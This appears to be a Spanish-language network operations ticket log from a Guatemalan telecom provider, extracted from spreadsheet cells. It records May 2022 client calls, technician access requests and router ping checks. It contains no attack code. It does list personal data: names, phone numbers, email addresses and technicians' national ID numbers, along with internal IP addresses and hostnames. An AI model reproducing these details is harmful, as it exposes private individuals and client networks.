PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; 'JULIO FERNANDO TZOC' &lt;JEFETOTO@CREDIGUATE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'WALTER ESTUARDO GARCÍA' &lt;GERENTESISTEMAS@CREDIGUATE.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
BUENA TARDE.
SE CONFIRMA DE ENTERADO  Y POR ESTE MEDIO SE ESTÁ NOTIFICANDO A LA AGENCIA LA VISITA DE TÉCNICO.
SALUDOS CORDIALES
DE: JONATHAN EDUARDO TEZEN MEJIA [MAILTO:JONATHAN.TEZENM@CLARO.COM.GT]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 03:30 P.M.
PARA: INFORMATICA1@CREDIGUATE.COM.GT
CC: GRUPO N1; CNOCCA
ASUNTO: GESTION DE ACCESOS F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
BUEN DÍA  ESTIMADO CLIENTE
   GUSTO DE SALUDARLE ,  EL PRESENTE ES PARA SOLICITAR SEA  BRINDADO ACCESOS A NUESTRA ÁREA TÉCNICA, PARA TRABAJAR FALLA :  F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN
VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
CAYAX CHAVEZ, OSCAR EFRAIN  DPI 2347762500901
ALVAREZ CAHEX, DIEGO EDUARDO DPI 1887709920901
SALUDOS,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL MORALES AL  59394981 NO RESPONDE , ENVIA A BUZON SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS **
ID 2001582057 - 2001582289
**</t>
  </si>
  <si>
    <t>** SE ENVÍA CORREO A CLIENTE CON LOS NUEVOS DATOS **
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 9:03
PARA: ANIBAL MORALES &lt;INFORMATICA1@CREDIGUATE.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; 'JULIO FERNANDO TZOC' &lt;JEFETOTO@CREDIGUATE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'WALTER ESTUARDO GARCÍA' &lt;GERENTESISTEMAS@CREDIGUATE.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, FAVOR DE INCLUIR EN EL LISTADO A LOS TÉCNICO QUE SE DESCRIBEN A CONTINUACIÓN, YA QUE ES PERSONAL PARA VERIFICAR LA FIBRA:
MANOLO CELSO RAMOS POZ IBM 715715   DPI 1990 59209 0916
OSCAR RAUL RODAS TAY        IBM 715765   DPI  1802 39933 0901
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE ANIBAL MORALES AL 59394981  INDICA QUE YA ESTAN LOS ACCESOS AUTORIZADOS PARA LA HORA INDICADA **
ID 2001589432
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL MORALES 59394981 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001619172</t>
  </si>
  <si>
    <t>*** VISITA A LAS 14H, CLIENTE CONFIRMA AUTORIZADOS LOS PERMISOS ***
DE: ANIBAL MORALES &lt;INFORMATICA1@CREDIGUATE.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 12:36
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; 'JULIO FERNANDO TZOC' &lt;JEFETOTO@CREDIGUATE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'WALTER ESTUARDO GARCÍA' &lt;GERENTESISTEMAS@CREDIGUATE.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
BUEN DIA..
AUTORIZADO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL MORALES 59394981 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS AUTORIZADOS
-ID 2001670207</t>
  </si>
  <si>
    <t>F4561331</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FERNANDO AVILA  37366490 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001008184</t>
  </si>
  <si>
    <t>F4561336</t>
  </si>
  <si>
    <t>SE HABLA CON JOSUE HERRERA // DESEA SABER ETR, SE LE COMENTA TECNICO EN CAMINO SEGUN INFORMACIÓN DE CCR CR, AVANCES EN 45 MINUTOS A 1 HORA, ENTERADO A LA ESPERA DE AANCES.</t>
  </si>
  <si>
    <t>F4561338</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL FUENTES AL 76302994 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2002043690
**</t>
  </si>
  <si>
    <t>F4561342</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 13 DE MAYO DE 2022 16:31
PARA: JDEJGOMEZ@POPS.COM.GT &lt;JDEJGOMEZ@POPS.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | DISTRIBUIDORA POPS S.A. |397200030T | INTERNET.- BLVD. EL FRUTAL 14-00 Z.5 COMPLEJO COMERCIAL EL FRUTAL LOCAL PF3 VILLA NUEVA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO DISTRIBUIDORA POPS S.A. |397200030T  | INTERNET.- BLVD. EL FRUTAL 14-00 Z.5 COMPLEJO COMERCIAL EL FRUTAL LOCAL PF3 VILLA NUEVA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DIA DE HOY.
TECNICO:
JUAN ALBERTO TRUJILLO ORTIZ 732334 2487 19076 0115
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 36628871 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001080402
**</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE BRENDA MEDEZ / SHANDARI AL  56799028 | 36628871 NO RESPONDE || SE INTENTARA LUEGO **
ID 2001044602 - 2001044670
**</t>
  </si>
  <si>
    <t>F4561357</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL GAMEZ AL 63072349 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001027174
**</t>
  </si>
  <si>
    <t>F4561359</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO MORALES AL 77486934 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001014388
**</t>
  </si>
  <si>
    <t>F4561363</t>
  </si>
  <si>
    <t>F4561373</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO GUTIERREZ 30103461, CLIENTE VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. ID2001036236</t>
  </si>
  <si>
    <t>INFORMA CLIENTE ANDREA LOARCA 77630086 QUE REINICIO EQUIPOS PERO INCONVENIENTE PERSISTE, YA SE TIENE ENLACE A NIVEL DE PING,
&lt;QTZLGTXCN2D2B01B22EIM1&gt;PING -VPN-INSTANCE IP_PBX_ACCESO 10.105.130.6
  PING 10.105.130.6: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.105.130.6: BYTES=56 SEQUENCE=1 TTL=64 TIME=2 MS
    REPLY FROM 10.105.130.6: BYTES=56 SEQUENCE=2 TTL=64 TIME=2 MS
    REPLY FROM 10.105.130.6: BYTES=56 SEQUENCE=3 TTL=64 TIME=2 MS
    REPLY FROM 10.105.130.6: BYTES=56 SEQUENCE=4 TTL=64 TIME=2 MS
    REPLY FROM 10.105.130.6: BYTES=56 SEQUENCE=5 TTL=64 TIME=2 MS
  --- 10.105.130.6 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/2 MS</t>
  </si>
  <si>
    <t>F4561396</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA DE FALLA, SE VALIDA QUE EL SERVICIO YA ESTA OPERATIVO Y ESTABLE POR LO QUE NO APLICA EL ESTADO PC SE CAMBIA DE ESTA Y SE LE NOTIFICA AL GESTOR JAIMEJ.HERNANDEZ VIA SKYPE PARA EL CAMBIO DE ETAPA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTHIAN MORALES 24210880 EXT 129 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001144543
**</t>
  </si>
  <si>
    <t>F4561401</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISRAEL GONZALEZ 52988845 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001069190</t>
  </si>
  <si>
    <t>F4561410</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 MENCIONA QUE NO CUENTAN CON ENERGIA ELECTRICA EN PR
-ID 2001056916</t>
  </si>
  <si>
    <t>F4561424</t>
  </si>
  <si>
    <t>SE CERRARA MASIVA CUANDO SE CIERRE LA FALLA GENERAL YA QUE AL SER UN EQUIPO INALAMBRICO PODRIA PRESENTAR INESTABILIDAD Y PODER VALIDAR QUE SE ENCUENTRE OPERATIVO. Y ESTABLE</t>
  </si>
  <si>
    <t>F4561440</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MIGUEL PEREZ INFORMA QUE DEJARON DESCONECTADA LA LAN, SE LE SOLICITA CONECTAR LA LAN, INDICA QUE NO ESTA EN EL SITIO REMOTO, ESTARA DE REGRESO A  LAS 7 PM, ESTIMADOS CC VALIDAR HOY CON CLIENTE DESPUES DE LAS 7 PM.
  ENLACE OPERATIVO Y ESTABLE, A NIVEL DE CLARO, SE DEJA CONSTANCIA DEL PING HACIA INTERNET ES ESTABLE:
CC_YANILETH_DE_PEREZ_GT_INTERNET_PLAYA_GRANDE_QUICHE#PING 1.1.1.1 SOURCE VLAN 1 RE 3000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 3000, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 186.151.36.165
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3000/3000), ROUND-TRIP MIN/AVG/MAX = 32/35/60 MS</t>
  </si>
  <si>
    <t>F4561441</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:55
PARA: FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;; JULIO_ELIBERTO@HOTMAIL.COM &lt;JULIO_ELIBERTO@HOTMAIL.COM&gt;
CC: ZZ_ATENCION_CORPORATIVOS &lt;ATENCION.CORPORATIVOS@CLARO.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ID1028226 MINISTERIO DE DEFENSA CETAC
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4561442</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO GONZALEZ 36815425 SOLICITA LLAMADA EN 5 MIN
-ID 2001078985</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO GONZALEZ 36815425 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001080818</t>
  </si>
  <si>
    <t>F4561448</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR
ENVIADO: JUEVES, 12 DE MAYO DE 2022 17:46
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || VISA INTERNATIONAL || F4561448 || SD1124977
BUENA TARDE
     SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA	ID 	TICKET
VISA INTERNATIONAL
(TELMEX)	4914950
SD1124977
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDE JULIO QUIEN SOLICITA  DICTAMEN TECNICO
-ID 2001105049</t>
  </si>
  <si>
    <t>F4561455</t>
  </si>
  <si>
    <t>SE LLAMA A WILBER BARRIOS QUIEN INDICA QUE ESTAN REMODELANDO LA PROPIEDAD, ADICIONALMENTE MENCIONA QUE EL YA NO ES EL ENCARGADO DE LA PROPIEDAD QUE ACTUALMENTE ES JOSE MARIA SIC  30126984 QUIEN ES ENCARGADO DE TODAS LAS PROPIEDADES DE QUETZALTENANGO POR LO QUE INDICA QUE SE COORDINE CON ÉL, EL TIEMPO QUE ESTARAN DESCONECTADOS LOS EQUIPOS
2001670606
COLA:
NOMBRE: A: 30222544
NÚMERO: 30222544
DURACIÓN: 0:02:37
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 30222544
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 12:12:41</t>
  </si>
  <si>
    <t>CLIENTE JOSE MARIA INDICA QUE AUN CONTINUAN TRABAJOS DE REMODELACION, COMENTA QUE SE LE LLAME EL DIA MARTES 24 EN HORARIO 9:00 AM POR SI NO HA LEVANTADO ENLACE.
3001029690
COLA:
NOMBRE: A: 30126984
NÚMERO: 011 50230126984
DURACIÓN: 0:01:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50230126984
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 17/05/2022 18:02:59</t>
  </si>
  <si>
    <t>SE DARA SEGUIMIENTO DIA MARTES 24 SEGUN INDICACIONES DEL CLIENTE DEBIDO A REMODELACIONES DEL LUGAR</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO SE ENCUENTRA EN SITIO POR LO QUE MAÑANA A LAS 3 DE LA TARDE SE HARA PRESENTE EN PUNTO REMOTO PARA REVISAR SI NO ESTA DESCONECTADO ALGUN DISPOSITIVO, INDICA FAVOR DE FAVOR LLAMAR A LAS 4 PM DE MAÑANA.
2001765874
COLA:
NOMBRE: A: 30126984
NÚMERO: 011 50230126984
DURACIÓN: 0:01:34
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50230126984
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 16/05/2022 16:51:53</t>
  </si>
  <si>
    <t>SE LLAMA A JOSE MARIA SIC QUIEN CONFIRMA TEMA DE REMODELACION E INDICA QUE DESCONOCE SI DESCONECTARON LOS EQUIPOS PUES ELLOS AUN UTILIZAN UNA PARTE DE LA RENTA POR LO QUE SOLICITA QUE SE LLAMEN NUEVAMENTE A LAS 15:00 PARA BRINDAR MAYOR INFORMACIÓN
2001672227
COLA:
NOMBRE: A: 30126984
NÚMERO: 011 50230126984
DURACIÓN: 0:01:30
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50230126984
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 12:16:05</t>
  </si>
  <si>
    <t>F4561466</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE . 52(55) 5174 5299 RESPONDE JULIO MENCIONA QUE CONTINUAN A LA ESPERA POR PARTE DE CLIENTE FINAL
-ID 2001105049</t>
  </si>
  <si>
    <t>F4561478</t>
  </si>
  <si>
    <t>SE SOLICITA CIERRE DE TT VIA CORREO.
RE: TICKET#20484265 ¿ CAÍDA ENLACE LA_UNION-CL-IP2148072</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE NOTIFICANDOLE CAIDA A NIVEL LAN, SIN EQUIPOS CONECTADOS..
TICKET#20484265 ¿ CAÍDA ENLACE LA_UNION-CL-IP2148072</t>
  </si>
  <si>
    <t>SE RECIBIO CORREO DE CLIENTE-- EN ESPERA QUE REALICEN LA RECONEXION A NIVEL LAN
ROBER ALCIDES DUENAS ALCANTARA &lt;RDUENAS@BANCOAGRICOLA.COM.SV&gt;
JUE 12/05/2022 14:37
MUCHAS GRACIAS YENSI, POR EL APOYO.
CID:IMAGE001.PNG@01D76756.04F7DC40
ROBER DUEÑAS
NETWORKING Y SEGURIDAD TI
GERENCIA DATA CENTER
+503 2514-8976
CENTRO DE OPERACIONES
RODUENAS@BANCOAGRICOLA.COM.SV</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 11:02
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; ROBER ALCIDES DUENAS ALCANTARA &lt;RDUENAS@BANCOAGRICOLA.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;; JOSUE REYNALDO RIVERA RIVERA &lt;JRRIVERA@BANCOAGRICOLA.COM.SV&gt;
CC: MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; JESSICA FELICITA MARROQUIN FERRERA &lt;JFMARROQ@BANCOAGRICOLA.COM.SV&gt;; OSCAR ARMANDO CAMINOS CHAVEZ &lt;OCAMINOS@BANCOAGRICOLA.COM.SV&gt;; VICTOR ANTONIO GARCIA VASQUEZ &lt;VIAGARCI@BANCOAGRICOLA.COM.SV&gt;; GESTION INCIDENTES TI BANCO AGRICOLA &lt;GEINTIBA@BANCOAGRICOLA.COM.SV&gt;; JOSE MANUEL GRANDE VIDES &lt;JMGRANDE@BANCOAGRICOLA.COM.SV&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET#20484265 ¿ CAÍDA ENLACE LA_UNION-CL-IP2148072
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4561480</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 12 DE MAYO DE 2022 14:11PARA: FESQUIVEL@DISTELSA.COM.GT &lt;FESQUIVEL@DISTELSA.COM.GT&gt;; DROSALES@DISTELSA.COM.GT &lt;DROSALES@DISTELSA.COM.GT&gt;; KSABALLOS@DISTELSA.COM.GT &lt;KSABALLOS@DISTELSA.COM.GT&gt;; LPEREZ@DISTELSA.COM.GT &lt;LPEREZ@DISTELSA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_DISTELSA_GT_3G_PLAZA_ZONA_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1480
ID: 61200235T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_3G_PLAZA_ZONA_4
UBICADO EN:  6A. AVENIDA 0-60 ZONA 4,CENTRO COMERCIAL PZ4
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4561495</t>
  </si>
  <si>
    <t>SE LLAMA A CLEITNE ANDREA MOLINA 2133-9603 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001103361</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ANDREA MOLINA AL 2133-9603 -7860-2964 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001082789 2001083357
**</t>
  </si>
  <si>
    <t>F4561512</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 SE LE MENCIONA EL INCONVENIENTE QUE ESTA PRESENTANDO EL SERVICIO DE LA CENTRAL, CLIENTE INDICA QUE REPORTARA EL ID DE LA CENTRAL
-ID 2001074647</t>
  </si>
  <si>
    <t>F4561517</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE PARTE DEL CLIENTE SOLICITANDO MONITOREO HASTA MAÑANA 13/05 A LAS 8:00 AM, SE LE RESPONDE Y NOTIFICA A ALEJANDRO.NAVARRO VIA SKYPE | WIP
DE: CORPOWALMART
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 19:52
